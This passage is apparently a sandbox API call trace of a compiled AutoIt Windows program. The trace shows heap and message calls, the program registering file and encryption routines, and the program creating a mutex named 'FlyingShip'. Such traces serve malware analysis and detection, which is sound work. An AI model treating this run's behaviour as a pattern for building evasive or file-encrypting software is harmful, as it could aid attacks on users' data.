[0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a250 | out: hHeap=0x650000) returned 1 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a98 | out: hHeap=0x650000) returned 1 [0071.655] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.655] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770d30 | out: hHeap=0x650000) returned 1 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a98 | out: hHeap=0x650000) returned 1 [0071.655] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.655] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770d30 | out: hHeap=0x650000) returned 1 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a98 | out: hHeap=0x650000) returned 1 [0071.655] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.655] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x759e88 | out: hHeap=0x650000) returned 1 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a98 | out: hHeap=0x650000) returned 1 [0071.655] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.655] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770d30 | out: hHeap=0x650000) returned 1 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a98 | out: hHeap=0x650000) returned 1 [0071.655] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a250 | out: hHeap=0x650000) returned 1 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a268 | out: hHeap=0x650000) returned 1 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766aa8 | out: hHeap=0x650000) returned 1 [0071.655] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a268 | out: hHeap=0x650000) returned 1 [0071.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a280 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766ab8 | out: hHeap=0x650000) returned 1 [0071.656] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a280 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a298 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766ac8 | out: hHeap=0x650000) returned 1 [0071.656] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a298 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a2b0 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766ad8 | out: hHeap=0x650000) returned 1 [0071.656] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a2b0 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a2c8 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766ae8 | out: hHeap=0x650000) returned 1 [0071.656] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a2c8 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a2e0 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766af8 | out: hHeap=0x650000) returned 1 [0071.656] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a2e0 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a2f8 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766b08 | out: hHeap=0x650000) returned 1 [0071.656] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a2f8 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a310 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766b18 | out: hHeap=0x650000) returned 1 [0071.656] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a310 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a328 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766b28 | out: hHeap=0x650000) returned 1 [0071.656] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a328 | out: hHeap=0x650000) returned 1 [0071.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a340 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690370 | out: hHeap=0x650000) returned 1 [0071.657] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a340 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a358 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690380 | out: hHeap=0x650000) returned 1 [0071.657] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a358 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a370 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690390 | out: hHeap=0x650000) returned 1 [0071.657] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a370 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a388 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6903a0 | out: hHeap=0x650000) returned 1 [0071.657] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a388 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a3a0 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6903b0 | out: hHeap=0x650000) returned 1 [0071.657] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a3a0 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a3b8 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6903c0 | out: hHeap=0x650000) returned 1 [0071.657] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a3b8 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a3d0 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6903d0 | out: hHeap=0x650000) returned 1 [0071.657] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a3d0 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a3e8 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6903e0 | out: hHeap=0x650000) returned 1 [0071.657] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a3e8 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a400 | out: hHeap=0x650000) returned 1 [0071.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6903f0 | out: hHeap=0x650000) returned 1 [0071.658] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a400 | out: hHeap=0x650000) returned 1 [0071.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a418 | out: hHeap=0x650000) returned 1 [0071.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690400 | out: hHeap=0x650000) returned 1 [0071.658] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a418 | out: hHeap=0x650000) returned 1 [0071.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a430 | out: hHeap=0x650000) returned 1 [0071.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690410 | out: hHeap=0x650000) returned 1 [0071.658] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a460 | out: hHeap=0x650000) returned 1 [0071.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690420 | out: hHeap=0x650000) returned 1 [0071.658] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a460 | out: hHeap=0x650000) returned 1 [0071.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a478 | out: hHeap=0x650000) returned 1 [0071.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690430 | out: hHeap=0x650000) returned 1 [0071.664] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a478 | out: hHeap=0x650000) returned 1 [0071.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a490 | out: hHeap=0x650000) returned 1 [0071.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690440 | out: hHeap=0x650000) returned 1 [0071.664] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a490 | out: hHeap=0x650000) returned 1 [0071.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a4a8 | out: hHeap=0x650000) returned 1 [0071.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690450 | out: hHeap=0x650000) returned 1 [0071.664] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.664] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a4d8 | out: hHeap=0x650000) returned 1 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690470 | out: hHeap=0x650000) returned 1 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a4f0 | out: hHeap=0x650000) returned 1 [0071.665] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.665] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770dd8 | out: hHeap=0x650000) returned 1 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690480 | out: hHeap=0x650000) returned 1 [0071.665] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.665] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770dd8 | out: hHeap=0x650000) returned 1 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690480 | out: hHeap=0x650000) returned 1 [0071.665] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.665] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ca50 | out: hHeap=0x650000) returned 1 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690480 | out: hHeap=0x650000) returned 1 [0071.665] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.665] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770dd8 | out: hHeap=0x650000) returned 1 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690480 | out: hHeap=0x650000) returned 1 [0071.665] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.665] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770dd8 | out: hHeap=0x650000) returned 1 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690480 | out: hHeap=0x650000) returned 1 [0071.665] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.665] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770dd8 | out: hHeap=0x650000) returned 1 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690480 | out: hHeap=0x650000) returned 1 [0071.665] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.665] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770dd8 | out: hHeap=0x650000) returned 1 [0071.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690480 | out: hHeap=0x650000) returned 1 [0071.666] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.666] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0071.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0071.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690480 | out: hHeap=0x650000) returned 1 [0071.666] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.666] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0071.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ca50 | out: hHeap=0x650000) returned 1 [0071.666] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.666] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0071.666] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.666] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0071.666] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.666] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0071.666] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.666] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0071.666] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0071.666] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0071.666] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.666] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0071.666] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.666] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0071.666] PeekMessageW (in: lpMsg=0x61f364, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f364) returned 0 [0071.666] PeekMessageW (in: lpMsg=0x61f364, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f364) returned 0 [0071.667] PeekMessageW (in: lpMsg=0x61f364, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f364) returned 0 [0071.667] PeekMessageW (in: lpMsg=0x61f364, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f364) returned 0 [0071.667] PeekMessageW (in: lpMsg=0x61f364, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f364) returned 0 [0071.667] PeekMessageW (in: lpMsg=0x61f364, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f364) returned 0 [0071.667] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0071.667] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0071.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7d8 [0071.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690570 [0071.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateMutexW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xd) returned 0x76a7f0 [0071.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateMutexW", cchWideChar=13, lpMultiByteStr=0x76a7f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateMutexW", lpUsedDefaultChar=0x0) returned 13 [0071.667] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="FlyingShip") returned 0x11c [0071.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690580 [0071.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6b1588 [0071.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7d8 [0071.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7f0 [0071.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a808 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a820 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690530 [0071.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a820 | out: hHeap=0x650000) returned 1 [0071.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690530 | out: hHeap=0x650000) returned 1 [0071.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a808 | out: hHeap=0x650000) returned 1 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a808 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a820 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a838 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690530 [0071.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a838 | out: hHeap=0x650000) returned 1 [0071.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690530 | out: hHeap=0x650000) returned 1 [0071.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a820 | out: hHeap=0x650000) returned 1 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a820 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a838 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a850 [0071.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 